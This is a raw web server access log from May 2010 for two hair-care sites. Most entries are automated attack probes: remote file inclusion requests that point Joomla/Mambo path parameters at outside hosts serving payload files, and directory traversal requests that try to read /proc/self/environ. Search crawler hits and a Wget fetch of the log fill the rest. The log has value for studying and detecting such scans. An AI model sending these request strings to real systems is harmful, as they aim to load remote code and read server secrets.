207.45.185.178 - - [03/May/2010:10:46:36 -0700] "GET /logs/access_091221.log//index.php?mosConfig.absolute.path=http://enniskillengaa.com//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.150.224.151 - - [03/May/2010:10:46:47 -0700] "GET /logs/access_091221.log//index.php?mosConfig.absolute.path=http://www.thetravelgig.com/administrator/components/com_templates/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [03/May/2010:10:46:58 -0700] "GET / HTTP/1.1" 200 926 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
207.45.185.178 - - [03/May/2010:10:47:14 -0700] "GET /logs/access_091228.log%20%20//index.php?mosConfig.absolute.path=http://enniskillengaa.com//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
207.45.185.178 - - [03/May/2010:10:47:14 -0700] "GET /logs//index.php?mosConfig.absolute.path=http://enniskillengaa.com//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
207.45.185.178 - - [03/May/2010:10:47:14 -0700] "GET /index.php?mosConfig.absolute.path=http://enniskillengaa.com//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
99.39.2.249 - - [03/May/2010:10:47:29 -0700] "GET /index.php?option=com_dbquery&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
207.45.185.178 - - [03/May/2010:10:47:44 -0700] "GET /logs/access_091221.log%20%20//index.php?mosConfig.absolute.path=http://enniskillengaa.com//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.150.224.151 - - [03/May/2010:10:47:53 -0700] "GET /index.php?mosConfig.absolute.path=http://www.thetravelgig.com/administrator/components/com_templates/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.150.224.151 - - [03/May/2010:10:47:53 -0700] "GET /logs/access_091228.log%20%20//index.php?mosConfig.absolute.path=http://www.thetravelgig.com/administrator/components/com_templates/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.150.224.151 - - [03/May/2010:10:47:53 -0700] "GET /logs//index.php?mosConfig.absolute.path=http://www.thetravelgig.com/administrator/components/com_templates/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.150.224.151 - - [03/May/2010:10:48:02 -0700] "GET /index.php?mosConfig.absolute.path=http://www.thetravelgig.com/administrator/components/com_templates/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.150.224.151 - - [03/May/2010:10:48:02 -0700] "GET /logs//index.php?mosConfig.absolute.path=http://www.thetravelgig.com/administrator/components/com_templates/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.150.224.151 - - [03/May/2010:10:48:02 -0700] "GET /logs/access_091228.log%20%20//index.php?mosConfig.absolute.path=http://www.thetravelgig.com/administrator/components/com_templates/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.150.224.151 - - [03/May/2010:10:48:23 -0700] "GET /index.php?mosConfig.absolute.path=http://www.thetravelgig.com/administrator/components/com_templates/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.150.224.151 - - [03/May/2010:10:48:23 -0700] "GET /logs/access_091228.log%20%20//index.php?mosConfig.absolute.path=http://www.thetravelgig.com/administrator/components/com_templates/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.150.224.151 - - [03/May/2010:10:48:23 -0700] "GET /logs//index.php?mosConfig.absolute.path=http://www.thetravelgig.com/administrator/components/com_templates/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.150.224.151 - - [03/May/2010:10:48:24 -0700] "GET /logs/access_091221.log%20%20//index.php?mosConfig.absolute.path=http://www.thetravelgig.com/administrator/components/com_templates/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
99.39.2.249 - - [03/May/2010:10:48:29 -0700] "GET /index.php?option=com_dbquery&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
216.150.224.151 - - [03/May/2010:10:48:42 -0700] "GET /logs/access_091221.log%20%20//index.php?mosConfig.absolute.path=http://www.thetravelgig.com/administrator/components/com_templates/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.150.224.151 - - [03/May/2010:10:48:55 -0700] "GET /logs/access_091221.log%20%20//index.php?mosConfig.absolute.path=http://www.thetravelgig.com/administrator/components/com_templates/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.177.33.14 - - [03/May/2010:10:51:19 -0700] "GET /index.php?mosConfig.absolute.path=http://www.e-gestur.com/econatura//components/com_zoom/classes/iptc/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.177.33.14 - - [03/May/2010:10:51:19 -0700] "GET /logs/access_091228.log%20%20//index.php?mosConfig.absolute.path=http://www.e-gestur.com/econatura//components/com_zoom/classes/iptc/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.177.33.14 - - [03/May/2010:10:51:19 -0700] "GET /logs//index.php?mosConfig.absolute.path=http://www.e-gestur.com/econatura//components/com_zoom/classes/iptc/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.177.33.14 - - [03/May/2010:10:52:07 -0700] "GET /logs/access_091221.log%20%20//index.php?mosConfig.absolute.path=http://www.e-gestur.com/econatura//components/com_zoom/classes/iptc/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
119.235.237.19 - - [03/May/2010:10:53:55 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13649 HTTP/1.1" 200 349 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "www.freehairsecrets.com"
184.73.125.29 - - [03/May/2010:10:54:05 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "SheenBot/SheenBot-1.0.4 (Sheen web crawler)" "www.freehairsecrets.com"
184.73.125.29 - - [03/May/2010:10:54:05 -0700] "GET /freehairsecretsphp/ HTTP/1.0" 200 333 "-" "SheenBot/SheenBot-1.0.4 (Sheen web crawler)" "www.freehairsecrets.com"
77.88.25.28 - - [03/May/2010:10:55:03 -0700] "GET /freehairsecretsphp/viewtopic.php?p=18906 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [03/May/2010:11:06:37 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13829 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
99.39.2.249 - - [03/May/2010:11:08:11 -0700] "GET /logs/access_100125.log/index.php?option=com_dbquery&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
99.39.2.249 - - [03/May/2010:11:08:11 -0700] "GET /index.php?option=com_dbquery&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
99.39.2.249 - - [03/May/2010:11:08:12 -0700] "GET /logs/index.php?option=com_dbquery&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
88.250.57.232 - - [03/May/2010:11:11:15 -0700] "GET /logs/access_100503.log HTTP/1.0" 200 2519989 "-" "Wget/1.11.4" "www.freehairsecrets.com"
88.250.57.232 - - [03/May/2010:11:13:56 -0700] "GET /logs/access_100503.log HTTP/1.0" 200 2519989 "-" "Wget/1.11.4" "growlonghairfast.com"
77.88.25.28 - - [03/May/2010:11:15:35 -0700] "GET /freehairsecretsphp/viewtopic.php?p=18786 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
99.39.2.249 - - [03/May/2010:11:16:56 -0700] "GET /index2.php?option=com_extended_registration&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
99.39.2.249 - - [03/May/2010:11:17:28 -0700] "GET /index2.php?option=com_extended_registration&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
99.39.2.249 - - [03/May/2010:11:19:51 -0700] "GET /logs/access_100426.log/index2.php?option=com_extended_registration&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
99.39.2.249 - - [03/May/2010:11:19:52 -0700] "GET /index2.php?option=com_extended_registration&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
99.39.2.249 - - [03/May/2010:11:19:52 -0700] "GET /logs/index2.php?option=com_extended_registration&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
77.88.25.28 - - [03/May/2010:11:20:55 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14137 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
99.39.2.249 - - [03/May/2010:11:25:05 -0700] "GET /logs/access_100125.log/index.php?option=com_dbquery&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
99.39.2.249 - - [03/May/2010:11:25:06 -0700] "GET /index.php?option=com_dbquery&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
99.39.2.249 - - [03/May/2010:11:25:06 -0700] "GET /logs/index.php?option=com_dbquery&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
184.73.125.29 - - [03/May/2010:11:25:21 -0700] "GET /logs/ HTTP/1.0" 200 5069 "-" "SheenBot/SheenBot-1.0.4 (Sheen web crawler)" "www.freehairsecrets.com"
92.241.190.214 - - [03/May/2010:11:27:23 -0700] "GET /logs/access_100412.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.waterdistrict2.com/poll/.logs?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "growlonghairfast.com"
92.241.190.214 - - [03/May/2010:11:27:23 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.waterdistrict2.com/poll/.logs?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "growlonghairfast.com"
92.241.190.214 - - [03/May/2010:11:27:23 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.waterdistrict2.com/poll/.logs?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "growlonghairfast.com"
92.241.190.214 - - [03/May/2010:11:31:59 -0700] "GET /logs/access_100419.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.waterdistrict2.com/poll/.logs?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "growlonghairfast.com"
99.39.2.249 - - [03/May/2010:11:33:51 -0700] "GET /logs/access.log/index.php?option=com_dbquery&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
99.39.2.249 - - [03/May/2010:11:33:51 -0700] "GET /index.php?option=com_dbquery&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
99.39.2.249 - - [03/May/2010:11:33:51 -0700] "GET /logs/index.php?option=com_dbquery&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
124.115.1.7 - - [03/May/2010:11:34:46 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15213 HTTP/1.1" 200 349 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.freehairsecrets.com"
99.39.2.249 - - [03/May/2010:11:35:35 -0700] "GET /logs/access_100125.log/index2.php?option=com_extended_registration&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
180.210.205.118 - - [03/May/2010:11:38:56 -0700] "GET /logs/access.log%20%20////////?mosConfig_absolute_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
180.210.205.118 - - [03/May/2010:11:38:56 -0700] "GET ///////?mosConfig_absolute_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 200 931 "-" "Mozilla/5.0" "www.freehairsecrets.com"
180.210.205.118 - - [03/May/2010:11:38:56 -0700] "GET /logs////////?mosConfig_absolute_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 200 5096 "-" "Mozilla/5.0" "www.freehairsecrets.com"
180.210.205.118 - - [03/May/2010:11:38:59 -0700] "GET /logs/access.log%20%20////////?mosConfig_absolute_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
180.210.205.118 - - [03/May/2010:11:38:59 -0700] "GET ///////?mosConfig_absolute_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 200 931 "-" "Mozilla/5.0" "www.freehairsecrets.com"
180.210.205.118 - - [03/May/2010:11:38:59 -0700] "GET /logs////////?mosConfig_absolute_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 200 5096 "-" "Mozilla/5.0" "www.freehairsecrets.com"
180.210.205.118 - - [03/May/2010:11:39:00 -0700] "GET ///////?mosConfig_absolute_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 200 931 "-" "Mozilla/5.0" "www.freehairsecrets.com"
180.210.205.118 - - [03/May/2010:11:39:00 -0700] "GET /logs////////?mosConfig_absolute_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 200 5096 "-" "Mozilla/5.0" "www.freehairsecrets.com"
180.210.205.118 - - [03/May/2010:11:39:00 -0700] "GET /logs/access.log%20%20////////?mosConfig_absolute_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
184.73.125.29 - - [03/May/2010:11:39:27 -0700] "GET /tmp/ HTTP/1.0" 200 643 "-" "SheenBot/SheenBot-1.0.4 (Sheen web crawler)" "www.freehairsecrets.com"
92.241.190.214 - - [03/May/2010:11:40:16 -0700] "GET /logs/access_100405.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.waterdistrict2.com/poll/.logs?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "growlonghairfast.com"
124.217.229.185 - - [03/May/2010:11:44:11 -0700] "GET /logs/access.log%20%20////////?mosConfig_absolute_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
124.217.229.185 - - [03/May/2010:11:44:11 -0700] "GET ///////?mosConfig_absolute_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 200 931 "-" "Mozilla/5.0" "www.freehairsecrets.com"
124.217.229.185 - - [03/May/2010:11:44:11 -0700] "GET /logs////////?mosConfig_absolute_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 200 5096 "-" "Mozilla/5.0" "www.freehairsecrets.com"
124.217.229.185 - - [03/May/2010:11:44:15 -0700] "GET /logs/access.log%20%20////////?mosConfig_absolute_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
124.217.229.185 - - [03/May/2010:11:44:15 -0700] "GET ///////?mosConfig_absolute_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 200 931 "-" "Mozilla/5.0" "www.freehairsecrets.com"
124.217.229.185 - - [03/May/2010:11:44:15 -0700] "GET /logs////////?mosConfig_absolute_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 200 5096 "-" "Mozilla/5.0" "www.freehairsecrets.com"
70.38.117.233 - - [03/May/2010:11:49:49 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
70.38.117.233 - - [03/May/2010:11:49:49 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
70.38.117.233 - - [03/May/2010:11:49:49 -0700] "GET /logs/access_100426.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
70.38.117.233 - - [03/May/2010:11:50:05 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
70.38.117.233 - - [03/May/2010:11:50:05 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
70.38.117.233 - - [03/May/2010:11:50:05 -0700] "GET /logs/access_100426.log/components/com_performs/performs.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
70.38.117.233 - - [03/May/2010:11:50:17 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
70.38.117.233 - - [03/May/2010:11:50:18 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
70.38.117.233 - - [03/May/2010:11:50:18 -0700] "GET /logs/access_100426.log/components/com_performs/performs.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
119.63.198.114 - - [03/May/2010:11:51:35 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13076 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "growlonghairfast.com"
70.38.117.233 - - [03/May/2010:11:52:49 -0700] "GET /logs/access_100125.log/components/com_performs/performs.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [03/May/2010:11:52:55 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14971 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
70.38.117.233 - - [03/May/2010:11:53:55 -0700] "GET /logs/access_100125.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
119.63.198.94 - - [03/May/2010:11:54:44 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15066 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.freehairsecrets.com"
209.59.147.177 - - [03/May/2010:12:05:21 -0700] "GET /statistics-by-countries/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
209.59.147.177 - - [03/May/2010:12:07:51 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
77.88.25.28 - - [03/May/2010:12:08:14 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13301 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
212.241.251.224 - - [03/May/2010:12:08:28 -0700] "GET /index.php?option=com_fabrik&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
212.68.62.5 - - [03/May/2010:12:11:39 -0700] "GET //?path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
212.68.62.5 - - [03/May/2010:12:11:40 -0700] "GET /logs///?path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 200 5091 "-" "Mozilla/5.0" "growlonghairfast.com"
212.68.62.5 - - [03/May/2010:12:11:40 -0700] "GET //?path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
212.68.62.5 - - [03/May/2010:12:11:40 -0700] "GET /logs///?path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 200 5091 "-" "Mozilla/5.0" "growlonghairfast.com"
212.68.62.5 - - [03/May/2010:12:11:46 -0700] "GET /logs/access_100125.log///?path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.68.62.5 - - [03/May/2010:12:11:46 -0700] "GET /logs/access_100125.log///?path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
119.235.237.20 - - [03/May/2010:12:15:29 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13835 HTTP/1.1" 200 349 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "www.freehairsecrets.com"
209.59.147.177 - - [03/May/2010:12:19:21 -0700] "GET /logs/access.log//statistics-by-countries/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
209.59.147.177 - - [03/May/2010:12:19:21 -0700] "GET /statistics-by-countries/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
209.59.147.177 - - [03/May/2010:12:19:21 -0700] "GET /logs//statistics-by-countries/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
202.69.230.122 - - [03/May/2010:12:24:42 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://wonil.org/bbs//sc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
202.69.230.122 - - [03/May/2010:12:24:42 -0700] "GET /logs/access_100329.log%20%20/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://wonil.org/bbs//sc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
202.69.230.122 - - [03/May/2010:12:24:42 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://wonil.org/bbs//sc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.241.251.224 - - [03/May/2010:12:25:52 -0700] "GET /logs/access.log/index.php?option=com_fabrik&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
212.241.251.224 - - [03/May/2010:12:25:53 -0700] "GET /index.php?option=com_fabrik&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
212.241.251.224 - - [03/May/2010:12:25:53 -0700] "GET /logs/index.php?option=com_fabrik&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
209.59.147.177 - - [03/May/2010:12:26:46 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
209.59.147.177 - - [03/May/2010:12:26:46 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
